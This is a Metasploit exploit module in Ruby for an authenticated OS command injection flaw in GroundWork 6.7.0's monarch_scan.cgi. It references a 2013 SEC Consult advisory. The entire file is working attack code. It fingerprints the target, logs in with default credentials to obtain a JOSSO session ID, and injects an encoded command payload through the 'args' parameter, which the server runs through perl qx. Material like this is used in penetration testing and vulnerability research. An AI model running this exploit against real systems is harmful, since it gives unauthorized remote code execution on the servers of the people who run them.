## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] } include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "GroundWork monarch_scan.cgi OS Command Injection", 'Description' => %q{ This module exploits a vulnerability found in GroundWork 6.7.0. This software is used for network, application and cloud monitoring. The vulnerability exists in the monarch_scan.cgi, where user controlled input is used in the perl qx function, which allows any remote authenticated attacker, whatever his privileges are, to inject system commands and gain arbitrary code execution. The module has been tested successfully on GroundWork 6.7.0-br287-gw1571 as distributed within the Ubuntu 10.04 based VM appliance. }, 'License' => MSF_LICENSE, 'Author' => [ 'Johannes Greil', # Vulnerability Discovery, PoC 'juan vazquez' # Metasploit module ], 'References' => [ [ 'OSVDB', '91051' ], [ 'US-CERT-VU', '345260' ], [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130308-0_GroundWork_Monitoring_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ] ], 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 8190, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd' }, # Based on the default Ubuntu 10.04 VM appliance 'RequiredCmd' => 'generic telnet netcat perl python' }, 'Platform' => ['unix', 'linux'], 'Targets' => [ ['GroundWork 6.7.0', {}] ], 'Privileged' => false, 'DisclosureDate' => "Mar 8 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('USERNAME', [true, 'GroundWork Username', 'user']), OptString.new('PASSWORD', [true, 'GroundWork Password', 'user']) ], self.class) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("josso", "signon", "login.do") }) if res and res.body =~ /GroundWork.*6\.7\.0/ return Exploit::CheckCode::Appears elsif res and res.body =~ /GroundWork/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def get_josso_token res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("josso", "signon", "usernamePasswordLogin.do"), 'vars_post' => { 'josso_cmd' => 'login', 'josso_username' => datastore['USERNAME'], 'josso_password' => datastore['PASSWORD'] } }) if res and res.headers['Set-Cookie'] =~ /JOSSO_SESSIONID_josso=([A-F0-9]+)/ return $1 else return nil end end def execute_command(command) http_handler = ((datastore['SSL']) ? "https" : "http") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("monarch", "monarch_scan.cgi"), 'headers' => { 'Referer' => "#{http_handler}://#{rhost}/portal/auth/portal/groundwork-monitor/auto-disc" }, 'cookie' => "JOSSO_SESSIONID=#{@josso_id}", 'query' => "args=#{rand_text_alpha(3)}&args=#{rand_text_alpha(3)}&args=#{Rex::Text.uri_encode(command + ";")}" }) return res end def exploit peer = "#{rhost}:#{rport}" print_status("#{peer} - Attempting to login...") @josso_id = get_josso_token if @josso_id.nil? fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to retrieve a JOSSO session ID") end print_good("#{peer} - Authentication successful") print_status("#{peer} - Sending malicious request...") execute_command(payload.encoded) end end